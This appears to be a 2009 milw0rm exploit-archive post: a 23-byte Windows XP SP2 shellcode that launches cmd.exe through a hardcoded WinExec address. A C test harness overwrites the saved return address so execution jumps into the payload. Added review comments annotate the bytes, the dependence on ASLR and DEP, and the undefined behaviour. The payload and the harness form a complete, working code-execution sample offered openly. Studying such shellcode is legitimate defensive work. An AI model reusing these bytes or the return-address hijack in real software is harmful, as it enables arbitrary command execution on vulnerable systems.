win32xp sp2 En cmd.exe 23 bytes by h3m4n

  1     /*
  2     win32/xp sp2 (En) cmd.exe 23 bytes
  3     Author : Mountassif Moad
  4     A.K.A : Stack
  5     Description : A 23-byte shellcode that executes cmd.exe. Tested under Windows XP SP2 (En).
  6
  7     We get the following if we disassemble the compiled code with OllyDbg:
  8
  9     00402000 > 8BEC                       MOV EBP,ESP
  10    00402002 . 68 65786520                PUSH 20657865
  11    00402007 . 68 636D642E                PUSH 2E646D63
  12    0040200C . 8D45 F8                    LEA EAX,DWORD PTR SS:[EBP-8]
  13    0040200F . 50                         PUSH EAX
  14    00402010 . B8 8D15867C                MOV EAX,kernel32.WinExec
  15    00402015 . FFD0                       CALL EAX
  16    */
  17    #include <stdio.h>
  18    unsigned char shellcode[] =
        /*
         * 23 payload bytes. The string literal also appends a terminating NUL,
         * so sizeof shellcode is 24 while strlen() reports 23 (no byte below
         * is 0x00).
         *
         * Byte-to-instruction map, taken from the disassembly in the header
         * comment:
         *
         *   8b ec             MOV  EBP, ESP
         *   68 65 78 65 20    PUSH 0x20657865    ; bytes spell "exe "
         *   68 63 6d 64 2e    PUSH 0x2E646D63    ; bytes spell "cmd."
         *   8d 45 f8          LEA  EAX, [EBP-8]  ; address of the two pushed dwords
         *   50                PUSH EAX
         *   b8 8d 15 86 7c    MOV  EAX, 0x7C86158D
         *   ff d0             CALL EAX
         *
         * Review notes (defensive reading):
         * - 0x7C86158D is an absolute address that the author's debugger
         *   labelled kernel32.WinExec. Nothing in these bytes resolves it at
         *   run time, so the payload is tied to the kernel32 build and load
         *   address of the system named in the header (XP SP2, En); where
         *   module bases are randomised (ASLR) the constant no longer names
         *   that export.
         * - The ASCII immediates "cmd." / "exe " next to a MOV EAX,imm32 /
         *   CALL EAX pair make the sequence simple to match statically. At
         *   run time the observable effect is a WinExec-launched cmd.exe
         *   whose parent is whatever process executed these bytes.
         */
  19                                   "\x8b\xec\x68\x65\x78\x65"
  20                                   "\x20\x68\x63\x6d\x64\x2e"
  21                                   "\x8d\x45\xf8\x50\xb8\x8D"
  22                                   "\x15\x86\x7C\xff\xd0";
  23    int main ()
  24    {
        /*
         * Test harness for shellcode[]: prints the payload length, then
         * overwrites a stack slot above the local `ret` with the array's
         * address, so that the function's return is meant to transfer
         * control into the payload instead of back to main's caller.
         *
         * Review notes:
         * - Which slot `(int *)&ret + 2` names is decided by the compiler's
         *   frame layout, not by the C language. The author presumably relies
         *   on [ret][saved EBP][return address] in an unoptimised 32-bit
         *   build; optimisation, stack cookies or a 64-bit target would put
         *   the write somewhere else. This is undefined behaviour.
         * - shellcode[] is an ordinary initialised global, i.e. data. Where
         *   data-execution prevention is enforced for the process, returning
         *   into it should fault rather than execute (confirm per platform).
         */
  25    int *ret;
        /* The cast binds before '+': ret points two int-sized slots above its own storage. */
  26    ret=(int *)&ret+2;
        /*
         * NOTE(review): strlen() is called with only <stdio.h> included, on an
         * unsigned char array, and its result is printed with %d. The
         * expected output is 23, since the payload has no embedded NUL.
         */
  27    printf("Shellcode Length is : %d\n",strlen(shellcode));
        /* Stores the array's address, narrowed to int, into the chosen slot. */
  28    (*ret)=(int)shellcode;
        /* If that slot was the saved return address, control goes to shellcode[] here. */
  29    return 0;
  30    }
  31
  32    // milw0rm.com [2009−07−17]




Stack                                                                                                 07/17/2009

								